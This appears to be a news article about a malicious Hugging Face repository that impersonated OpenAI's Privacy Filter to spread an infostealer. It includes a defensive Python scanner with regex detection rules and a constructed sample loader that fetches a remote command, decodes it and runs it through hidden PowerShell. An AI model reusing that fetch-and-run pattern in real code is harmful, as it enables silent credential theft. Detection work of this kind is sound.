In brief
- A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter model reached #1 trending on the platform.
- The malware registered roughly 244,000 downloads and 667 likes in under 18 hours before being removed.
- The repository delivered a six-stage infostealer that harvested browser passwords, Discord tokens, crypto wallet keys, and SSH credentials from Windows machines, then silently sent everything to attacker-controlled servers.
OpenAI released Privacy Filter in late April: a small, open-weight model built to detect and automatically redact personally identifiable information from text. It landed on Hugging Face under an Apache 2.0 license and quickly attracted developer interest. Somebody noticed.
Within days, a fake account named “Open-OSS” published a near-identical repository called privacy-filter. The model card was copied word for word from OpenAI’s. The only difference in the README file: instructions to clone the repo and run a file called start.bat on Windows, or loader.py on Linux and Mac.
Within 18 hours, the fake repo hit #1 on Hugging Face’s trending page, racking up roughly 244,000 downloads and 667 likes. HiddenLayer, the AI security firm that flagged the campaign, found that 657 of those 667 likes came from accounts matching predictable auto-generated bot-naming patterns.
The download numbers were almost certainly inflated the same way: manufactured social proof to make the bait look real.
How the malware actually worked
The malware essentially worked like a poisoned pill wrapped in a very convincing candy coating. The loader.py script opens with fake model training output (progress bars, synthetic datasets, dummy class names) designed to look like a real AI loader is running.
Under the hood, it quietly disables security checks, pulls an encoded command from a public JSON paste site (a clever trick: no need to update the repository when the payload changes), and passes that command to PowerShell running completely hidden in the background. Windows users see nothing.
That command downloads a second script from a domain mimicking a blockchain analytics API. That script downloads the actual malware, a custom-built infostealer written in Rust, adds it to Windows Defender’s exclusions list, then launches it with SYSTEM-level privileges via a scheduled task that immediately deletes itself after firing. The whole chain runs and cleans up after itself, leaving almost no trace.
The final payload is thorough. It grabs everything stored in Chrome and Firefox: saved passwords, session cookies, browser history, encryption keys, everything. It targets Discord accounts, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and takes screenshots across all monitors. Then it packages everything as a compressed JSON bundle and ships it to attacker-controlled servers.
There’s no need for us to tell you what the hackers can do with all that information later.
The malware also checks whether it is running in a virtual machine or a security sandbox, and quits quietly if it detects one. It is designed to run once on real targets, steal everything, and disappear.
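As an added defensive example (not code from the article, HiddenLayer, or Hugging Face): a small heuristic scanner that checks the script files in a cloned model repository for the loader behaviours described above (hidden PowerShell, a remotely fetched and decoded command, a Defender exclusion, a scheduled-task creation). The rule names, regexes and the sample loader text are my own constructions, not the real loader.py.

```python
"""Heuristic scanner for loader scripts inside a cloned model repository."""
from __future__ import annotations
import re
import tempfile
from pathlib import Path

# Each rule is (name, regex). Assumed indicators, chosen to match the behaviours
# the article attributes to loader.py and the scripts it chains to.
RULES = [
    ("hidden_powershell",
     re.compile(r"powershell.*?(-w(indowstyle)?\W+hidden|-enc(odedcommand)?\b)", re.I)),
    ("remote_decoded_cmd",
     re.compile(r"(urlopen|requests\.get|Invoke-WebRequest|\biwr\b)"
                r"[\s\S]{0,200}?(b64decode|FromBase64String)", re.I)),
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("scheduled_task", re.compile(r"(schtasks(\.exe)?\s+/create|Register-ScheduledTask)", re.I)),
    ("exec_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
]
SCRIPT_SUFFIXES = {".py", ".bat", ".cmd", ".ps1", ".sh"}

def scan_text(text: str) -> list[str]:
    """Return the names of every rule that fires on one file's contents."""
    return [name for name, rx in RULES if rx.search(text)]

def scan_repo(repo: Path) -> dict[str, list[str]]:
    """Scan every script-like file under repo; weights and JSON are skipped."""
    findings: dict[str, list[str]] = {}
    for path in repo.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            hits = scan_text(path.read_text(errors="ignore"))
            if hits:
                findings[str(path.relative_to(repo))] = hits
    return findings

# Constructed sample: decoy training output followed by the two indicators.
SAMPLE_LOADER = '''
print("Epoch 1/3  loss=0.42")          # decoy training output
blob = urlopen(PASTE_URL).read()
cmd = base64.b64decode(blob)
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cmd])
'''
# Constructed sample of what a benign inference script looks like.
SAMPLE_CLEAN = 'from transformers import pipeline\npipe = pipeline("token-classification", "privacy-filter")\n'

def demo() -> dict[str, list[str]]:
    """Write the constructed samples into a temp dir and scan it like a clone."""
    with tempfile.TemporaryDirectory() as tmp:
        repo = Path(tmp)
        (repo / "loader.py").write_text(SAMPLE_LOADER)
        (repo / "inference.py").write_text(SAMPLE_CLEAN)
        (repo / "config.json").write_text("{}")  # non-script files are skipped
        return scan_repo(repo)
```

Run demo() after cloning a repository you intend to execute scripts from; a hit is a reason to read the file, not proof of malice, and a clean result is not proof of safety.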
Why this is bigger than just one repo
This isn’t an isolated incident. It’s part of a pattern. HiddenLayer identified six more repositories under a separate Hugging Face account named “anthfu,” uploaded in late April, using the exact same malicious loader pointing to the exact same command server. These repos impersonated models like Qwen3, DeepSeek, and Bonsai to lure AI developers.
The infrastructure itself, a domain called api.eth-fastscan.org, was also observed hosting a separate malware sample that beacons to a command server. HiddenLayer believes the two campaigns are “likely linked” but cautions that shared infrastructure alone does not confirm a single operator.
This is what a supply chain attack against the AI developer community looks like. The attacker doesn’t break into OpenAI or Hugging Face. They just publish a convincing lookalike, game the trending algorithm with bots, and wait for developers to do the rest. A similar playbook hit the Lottie Player JavaScript library in 2024, costing one user 10 Bitcoin (worth over $700,000 at the time).
What if you downloaded it?
If you cloned Open-OSS/privacy-filter on a Windows machine and ran any file from it, you should treat the system as fully compromised. Don’t log into anything from that machine before wiping it.
After that, change all the credentials that were saved in your browser: passwords, session cookies, OAuth tokens. Move any crypto funds to a new wallet generated on a clean system ASAP and assume seed phrases were stolen.
Since it also takes your Discord information, and that service is heavily automated, you should invalidate your Discord sessions and reset that password. Any SSH keys or FTP credentials on that machine should be considered burned.
The repository has now been removed. Hugging Face has not disclosed what, if any, additional screening measures it plans to implement for trending repositories.
As of now, seven confirmed malicious repositories from this campaign have been identified. How many more exist, or existed before being detected, remains unknown.